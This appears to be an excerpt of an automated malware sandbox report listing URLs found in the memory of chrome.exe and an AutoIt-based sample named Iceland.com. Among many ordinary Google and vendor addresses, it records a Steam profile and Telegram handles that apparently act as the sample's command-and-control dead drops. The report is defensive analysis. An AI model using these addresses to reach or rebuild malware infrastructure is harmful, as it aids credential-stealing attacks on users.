                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 0000000F.00000003.2177076386.0000027802D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 0000000F.00000002.2229051820.0000044800770000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 0000000F.00000002.2215275180.000002780040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 0000000F.00000003.2150131736.000002780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.00000278002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 0000000F.00000003.2150131736.000002780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.00000278002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                Source: chrome.exe, 0000000F.00000003.2128769911.00000448006E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_202309180
                Source: chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusP
                Source: chrome.exe, 0000000F.00000002.2228851813.0000044800744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 0000000F.00000003.2168026621.0000027800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215027708.0000027800378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 0000000F.00000002.2214176844.00000278000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 0000000F.00000002.2215275180.000002780040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 0000000F.00000002.2214176844.00000278000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 0000000F.00000002.2214176844.00000278000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 0000000F.00000002.2214915433.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214176844.00000278000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145015465.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2143157721.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141719403.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.000002780033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219788042.0000027800E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 0000000F.00000002.2216467397.0000027800754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217810916.0000027800B44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217177896.0000027800950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215455608.000002780048C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 0000000F.00000002.2217810916.0000027800B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
                Source: chrome.exe, 0000000F.00000002.2216467397.0000027800754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216169540.00000278006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217177896.0000027800950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215455608.000002780048C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 0000000F.00000002.2216169540.00000278006D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 0000000F.00000002.2218650237.0000027800D00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215455608.000002780048C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 0000000F.00000002.2217289206.00000278009BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2220782297.0000027801144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219188786.0000027800DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219361613.0000027800E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219188786.0000027800DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219188786.0000027800DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219361613.0000027800E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219361613.0000027800E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219361613.0000027800E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219188786.0000027800DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 0000000F.00000002.2219264732.0000027800DEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218722030.0000027800D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219361613.0000027800E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2219188786.0000027800DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: chrome.exe, 0000000F.00000002.2217289206.00000278009BF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 0000000F.00000003.2150131736.000002780120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.00000278002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000002.2214046498.000002780008C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 0000000F.00000002.2214115191.00000278000A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216042708.0000027800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 0000000F.00000002.2216689699.00000278007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216042708.0000027800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 0000000F.00000002.2216758327.000002780080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsP
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000002.2215275180.000002780040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Iceland.com, 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, HVAI5F.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, HVAI5F.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp, HVAI5F.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, HVAI5F.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Iceland.com, 0000000A.00000003.1949840536.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1949809935.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950065296.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950117154.0000000000EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Iceland.com, 0000000A.00000003.1949840536.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1949809935.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950065296.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950117154.0000000000EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Iceland.com, 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2868559733.0000000000F10000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2868559733.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2871233735.00000000039BD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Iceland.com, 0000000A.00000002.2868559733.0000000000F10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelX
                Source: Iceland.com, 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Iceland.com, 0000000A.00000002.2868129868.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/r
                Source: chrome.exe, 0000000F.00000002.2217452713.0000027800A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Iceland.com, 0000000A.00000002.2868559733.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 0000000A.00000002.2871233735.00000000039BD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Tracking.0.dr, Iceland.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217905171.0000027800B6C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: Iceland.com, 0000000A.00000002.2872631842.0000000005F92000.00000004.00000800.00020000.00000000.sdmp, UAS0ZU.10.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Iceland.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 0000000F.00000003.2168117132.0000027800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 0000000F.00000003.2150227627.0000027800C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149376359.0000027800C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216783773.000002780081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217511194.0000027800A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 0000000F.00000002.2215894328.000002780060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216783773.000002780081C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 0000000F.00000002.2218221292.0000027800C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2I
                Source: chrome.exe, 0000000F.00000002.2214023061.0000027800080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_
                Source: chrome.exe, 0000000F.00000002.2214023061.0000027800080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_b?
                Source: chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: chrome.exe, 0000000F.00000002.2220472221.0000027801074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promosx
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218846363.0000027800D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217204874.0000027800964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216858307.0000027800850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
